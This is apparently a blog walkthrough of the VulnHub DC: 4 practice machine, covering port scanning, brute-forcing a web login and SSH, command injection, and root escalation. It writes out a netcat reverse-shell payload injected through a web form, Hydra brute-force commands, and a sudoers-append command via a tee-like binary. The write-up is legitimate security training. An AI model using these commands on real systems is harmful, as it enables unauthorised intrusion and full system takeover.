DC: 4 is another vulnerable machine hosted by VulnHub. This one the author rated a little tougher (beginner/intermediate), and that’s probably accurate. It’s not too tough but there’s certainly some things that would throw off beginners. Let’s jump in!
As usual we will start off with an nmap scan
namp -sC -sV -v 192.168.2.113 -oN map1
Here we see that port 22 and 80 are open. We can also see the version of nginx running.
You can run other nmap scans, but this is literally all that’s open. So, let’s check out the web page.
This is interesting, but that’s really all we get. The source page doesn’t reveal anything. Performing scans with gobuster, you can find some other directories and file name, but they all redirect back to this page. This really only leaves us with a couple of options. We can brute force this page, SSH, or try to find an exploit for nginx.
A quick search of nginx vulns doesn’t yield anything. We also don’t have any usernames for SSH. That leaves us with brute forcing this page.
There are a couple ways to go about this. We can use BurpSuite or Hydra. There are some issues though. The free version of BurpSuite will throttle (slow down) the brute force attempt as it goes along. It’s doable, but it takes a while.
Hydra does not have this issue, but the syntax is a lot more complicated. If not done correctly, it will give you false positives (that will actually still work if you keep the session alive).
For this walkthrough, I used BurpSuite Pro. It doesn’t have the throttling issue and is just easier to setup. It will work exactly the same as the free version. There’s just a speed difference. If you want to see how Hydra works with this, you can find a video walkthrough here where I go through it.
So start up BurpSuite, and set your browser proxy for http on 127.0.0.1 port 8080. I use the Firefox extension FoxyProxy but you can set it in options menu as well.
Now turn the proxy OFF just for the first interaction and put in admin for the username and test for the password and hit Submit.
The reason we turn it off the first time is because of the way it handles session cookies. You don’t have to turn it off, but then you’ll have to forward the first couple requests. It’s just faster to do it this way.
Now, turn the proxy on, re-enter the credentials, and press submit again. You should catch the request. If you’re trying the hydra route, you’ll need this session cookie and the request string at the bottom.
Now send it to intruder either with the right click menu or pressing ctl I and go to the positions tab.
Now, press the clear button, highlight the password variable (test in this case), and press the add button.
At this point you should only have the squiggly symbols around test.
Next go to the Payloads tab and press the Load button under the Payload section.
This will prompt for a word list. Do not use the rockyou wordlist in BurpSuite. It’s too big and it will crash. It’s fine for Hydra if you’re going that route.
I’m choosing a list from https://github.com/danielmiessler/SecLists. The nice thing is that the password can be found in many of these lists. I’ll go with the darkweb 2017 top 1000 this time.
Once it’s loaded, press Start attack.
Your output might vary slightly, but happy is the correct password. You’ll notice that everything after that password was entered will now authenticate. This is because of the session cookie. This is also why Hydra might show false positives.
Making sure that your proxy is off, login with the password happy (or anything else as long as you didn’t reset your session cookie).
Click on the command hyperlink.
On the command screen, you’ll see some options to run. Pick one of them and see what it does.
In my case, I chose to list files and it ran the ls -l command. Let’s catch it with our proxy and see if we can run other commands.
Once the command is caught, send it to Repeater using the right click menu or pressing ctl r. Notice that the command string is using a + for a space. We’ll need to remember that for later.
For now, change the command to whoami and click go
We have command injection! Let’s get a shell.
There’s a lot of ways you can do this. I used the which command (which netcat) to identify that netcat was on the box and used that.
Start a netcat listener on your attack machine.
nc -nlvp 7777
In the command, put in nc+-nv+192.168.2.30+7777+-e+/bin/bash
Make sure you have the right IP and port for your machine, and that the syntax is correct. An error here can easily hang this box and you’ll have to restart it. If you didn’t get the right password, this would be extra frustrating. 😊
Next press Go and you should be presented with a shell.
Let’s upgrade it with python
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Now let’s see what we can get into.
We can’t sudo because we don’t know the www-data password. There’s no database running (like with WordPress) so we can’t look for those credentials. Let’s look at the user directories and see if there’s anything interesting there.
Inside the /home/jim directory there’s a backup folder with a listing of passwords.
Since we have usernames and a password list, let’s brute force SSH starting with Jim’s account.
For this, we’ll use Hydra. Copy over the list first. You can use a variety of methods, but the most straight forward approach is to just copy and paste it. Then launch hydra
hydra -l jim -P pass.txt ssh://192.168.2.113
After a little bit, hydra comes back with the password jibril04
Now we can ssh in as Jim.
Jim doesn’t have sudo permissions either, so let’s go back to his directory and look at some of the files we couldn’t get to before.
Looking at mbox, we can see a test email sent by root. There seems to be a vulnerable version of Exim running, but I couldn’t get that exploit to work.
Let’s see if there’s other mail we can read in the mail folder. It’s kept in /var/mail
Inside the mail directory is an email to Jim with Charles’s password. Let’s su to Charles.
Now that we’re Charles, we find that sudo is available for a program called teehee.
Running this program produced something that looked like echo. Whenever a command was entered, it just spit it back out.
Let’s look at the help file.
It looks like it has some sort of file write capabilities, but I was a little lost on how to use it. I also couldn’t find any reference to this binary on Google. I then went to GTFOBins https://gtfobins.github.io/ to see if it was mentioned there.
While they didn’t have anything for teehee, they did have something for tee. That made me think that the binaries might be similar. I did a help on tee.
Notice anything? The help file is exactly the same.
We should be able to use the commands in GTFOBins to get root. The way tee (or teehee in this case) is that it writes to a file AND to standard output. This is useful when you want to capture output of a command and see it run at the same time.
In this case, we can use our sudo permissions to write our output to any file. There are some options here. You could write to the shadow file and make yourself root, or you can write to sudoers and sudo to root. I’m going to go the sudo route.
We will echo the parameters we want to write to sudoers and pipe it to teehee which will append the output (the parameter itself) to the sudoers file. It will look like this:
echo “charles ALL=(ALL:ALL) ALL” | sudo teehee -a /etc/sudoers
Once we have that in, we can sudo to root.
And we’re root!!
Let’s get the flag!
That’s all for DC: 4. It was a little more challenging than the others, but still not too hard for beginners. If you want to see a video walkthrough where I also show how to use Hydra you can find it here.
DC: 5 is next on the list.